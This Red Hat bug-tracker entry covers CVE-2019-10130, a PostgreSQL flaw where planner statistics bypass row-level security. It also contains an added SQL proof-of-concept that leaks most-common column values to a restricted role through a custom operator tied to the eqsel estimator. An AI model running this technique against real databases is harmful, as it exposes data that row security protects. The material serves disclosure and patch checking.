Bug 1707109 (CVE-2019-10130) - CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
Summary: CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2019-10130
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1709192 1709193 1709194 1709195 1709196 1709197 1845074 1857227 1872770 1881766 1881774 1909702 1909703 1909714 1909715 1909716
Blocks: 1707112
Reported: 2019-05-06 20:02 UTC by Pedro Sampaio
Modified: 2021-02-16 21:58 UTC (History)
CC List: 37 users

Fixed In Version: postgresql 11.3, postgresql 10.8, postgresql 9.6.13, postgresql 9.5.17
Doc Type: If docs needed, set a value
Doc Text:
PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.
Clone Of:
Environment:
Last Closed: 2020-09-08 13:17:46 UTC
Embargoed:


Attachments: (none)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHBA-2020:5643 0 None None None 2020-12-21 12:04:42 UTC
Red Hat Product Errata RHSA-2020:3669 0 None None None 2020-09-08 09:49:16 UTC
Red Hat Product Errata RHSA-2020:4295 0 None None None 2020-10-21 13:06:38 UTC
Red Hat Product Errata RHSA-2020:5619 0 None None None 2020-12-17 15:52:53 UTC
Red Hat Product Errata RHSA-2020:5661 0 None None None 2020-12-22 08:53:37 UTC
Red Hat Product Errata RHSA-2020:5664 0 None None None 2020-12-22 09:26:37 UTC
Red Hat Product Errata RHSA-2021:0164 0 None None None 2021-01-18 09:59:54 UTC
Red Hat Product Errata RHSA-2021:0166 0 None None None 2021-01-18 16:18:57 UTC
Red Hat Product Errata RHSA-2021:0167 0 None None None 2021-01-18 16:20:13 UTC

Description Pedro Sampaio 2019-05-06 20:02:17 UTC
PostgreSQL maintains column statistics for tables. Certain statistics, such
as histograms and lists of most common values, contain values taken from the
column. PostgreSQL does not evaluate row security policies before consulting
those statistics during query planning; an attacker can exploit this to read
the most common values of certain columns. Affected columns are those for
which the attacker has SELECT privilege and for which, in an ordinary query,
row-level security prunes the set of rows visible to the attacker.
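The following SQL is an added demonstration of the mechanism described above; it is not part of the bug report or of the PostgreSQL project's own test suite. The table, role, function and operator names (accounts, carol, leak_eq, ===) are made up. It sets up the two preconditions the description names (the attacker holds SELECT on the table, and RLS prunes the rows an ordinary query returns), then shows how planning alone, with no row ever returned, hands a most-common value to attacker-controlled code: the planner's eqsel estimator applies the operator's underlying function to each entry of the column's most-common-values list. Run the setup as a superuser; the cleanup at the end removes everything again.

```sql
-- Added demonstration of CVE-2019-10130 (constructed data, made-up names).
-- Setup as superuser: a table whose rows are filtered by row-level security.
CREATE TABLE accounts (owner text NOT NULL, secret text NOT NULL);
INSERT INTO accounts
    SELECT 'alice', 'alice-' || g FROM generate_series(1, 100) AS g;
-- One value repeated often enough to land in the most-common-values list.
INSERT INTO accounts
    SELECT 'bob', 'bob-shared-secret' FROM generate_series(1, 50) AS g;
INSERT INTO accounts VALUES ('carol', 'carol-only');

ALTER TABLE accounts ENABLE ROW LEVEL SECURITY;
CREATE POLICY own_rows ON accounts FOR SELECT USING (owner = current_user);

CREATE ROLE carol LOGIN;
GRANT SELECT ON accounts TO carol;        -- precondition 1: SELECT privilege
GRANT CREATE ON SCHEMA public TO carol;   -- lets carol define the helper operator
ANALYZE accounts;                         -- fills pg_statistic, including the MCV list

-- Sanity check: for an ordinary query RLS prunes the rows (precondition 2).
SET ROLE carol;
SELECT count(*) FROM accounts;            -- 1: only carol's own row is visible

-- Attacker steps as carol: a non-LEAKPROOF function that reports its input,
-- wired into an operator whose selectivity estimator is the built-in eqsel.
CREATE FUNCTION leak_eq(text, text) RETURNS boolean
    LANGUAGE plpgsql AS $$
BEGIN
    RAISE NOTICE 'planner evaluated operator on: %', $1;
    RETURN $1 = $2;
END
$$;
CREATE OPERATOR === (
    LEFTARG = text, RIGHTARG = text,
    PROCEDURE = leak_eq, RESTRICT = eqsel
);

-- Planning is enough; the query need not return any row.
EXPLAIN SELECT * FROM accounts WHERE secret === 'anything';
-- Unfixed server (before 9.5.17 / 9.6.13 / 10.8 / 11.3):
--   NOTICE:  planner evaluated operator on: bob-shared-secret
-- Fixed server: no NOTICE. The planner no longer applies a non-leakproof
-- operator to the statistics of a table whose rows RLS filters for this user.

-- Cleanup as superuser.
RESET ROLE;
DROP OPERATOR === (text, text);
DROP FUNCTION leak_eq(text, text);
DROP TABLE accounts;
REVOKE CREATE ON SCHEMA public FROM carol;
DROP ROLE carol;
```

Two caveats when using this as a check. The NOTICE still appears on a fixed server when the session is the table owner or a role with BYPASSRLS, because RLS does not apply to them and the planner is allowed to use the statistics; test as the restricted role. And the equality operator above only reaches the most-common-values list; the same pattern with RESTRICT = scalarltsel on a user-defined `<` operator reaches the histogram bounds, which is why the description lists both statistic kinds.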

Comment 1 Pedro Sampaio 2019-05-06 20:02:23 UTC
Acknowledgments:

Name: Noah Misch, the PostgreSQL Project
Upstream: Dean Rasheed

Comment 3 Doran Moppert 2019-05-13 07:22:59 UTC
Created mingw-postgresql tracking bugs for this issue:

Affects: fedora-all [bug 1709193]


Created postgresql tracking bugs for this issue:

Affects: fedora-all [bug 1709192]

Comment 5 Doran Moppert 2019-05-15 05:15:56 UTC
External References:

https://www.postgresql.org/about/news/1939/

Comment 6 Doran Moppert 2019-06-28 05:14:25 UTC
Statement:

This vulnerability requires row level security to be in use, and an attacker to be able to execute crafted queries against the target PostgreSQL database. Neither of these conditions is true in Red Hat Ansible Tower, Red Hat CloudForms or Red Hat Satellite.

Comment 9 errata-xmlrpc 2020-09-08 09:49:11 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2020:3669 https://access.redhat.com/errata/RHSA-2020:3669

Comment 10 Product Security DevOps Team 2020-09-08 13:17:46 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2019-10130

Comment 17 errata-xmlrpc 2020-10-21 13:06:34 UTC
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7

Via RHSA-2020:4295 https://access.redhat.com/errata/RHSA-2020:4295

Comment 24 errata-xmlrpc 2020-12-17 15:52:49 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2020:5619 https://access.redhat.com/errata/RHSA-2020:5619

Comment 25 errata-xmlrpc 2020-12-22 08:53:34 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions

Via RHSA-2020:5661 https://access.redhat.com/errata/RHSA-2020:5661

Comment 26 errata-xmlrpc 2020-12-22 09:26:31 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions

Via RHSA-2020:5664 https://access.redhat.com/errata/RHSA-2020:5664

Comment 27 errata-xmlrpc 2021-01-18 09:59:49 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.2 Extended Update Support

Via RHSA-2021:0164 https://access.redhat.com/errata/RHSA-2021:0164

Comment 28 errata-xmlrpc 2021-01-18 16:18:54 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.1 Extended Update Support

Via RHSA-2021:0166 https://access.redhat.com/errata/RHSA-2021:0166

Comment 29 errata-xmlrpc 2021-01-18 16:20:07 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.1 Extended Update Support

Via RHSA-2021:0167 https://access.redhat.com/errata/RHSA-2021:0167

